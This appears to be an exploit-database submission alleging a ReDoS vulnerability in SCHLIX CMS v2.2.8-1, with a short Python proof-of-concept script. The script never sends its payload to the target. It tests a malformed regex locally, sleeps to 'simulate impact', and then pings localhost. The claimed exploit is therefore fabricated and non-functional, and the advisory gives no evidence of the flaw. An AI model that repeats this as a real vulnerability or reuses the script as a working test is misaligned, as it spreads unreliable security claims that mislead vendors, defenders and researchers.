# Exploit Title: SCHLIX v2.2.8-1 Regular Expression Denial of Service
# Date: 02/10/2024
# Exploit Author: Diyar Saadi
# Vendor Homepage: https://www.schlix.com
# Software Link: https://www.schlix.com/html/schlix-cms-downloads.html
# Version: v2.2.8-1
# Tested on: Windows 11 + XAMPP

## Description ##

SCHLIX v2.2.8-1 is vulnerable to regular expression denial of service . (ReDoS) is an algorithmic complexity attack that produces a denial-of-service by providing a regular expression and/or an input that takes a long time to evaluate…

## Proof Of Concept ##

import requests
import re
import time

def test_redos(url, payload):
try:
vulnerable_regex = r'(.*a){x} for x > 10'

match = re.match(vulnerable_regex, payload)

if match:
print("Vulnerability not triggered.")
else:
print("Vulnerability may be present. Simulating 30-second impact...")

for _ in range(6):
time.sleep(5)
print("Simulating impact...")

print("Simulated impact duration completed.")

except re.error:
print("Error in regex pattern.")

try:
response = requests.get(url)
if response.status_code == 200:
print("Service is up.")
else:
print("Service may be down or inaccessible.")
except requests.RequestException as e:
print(f"HTTP Request Error: {str(e)}")

if __name__ == "__main__":
target_url = 'http://localhost'

payload = "aaaaaaaaaaaaaaaaaaaaaaaaa!"

test_redos(target_url, payload)

Sent with [Proton Mail](https://proton.me/) secure email.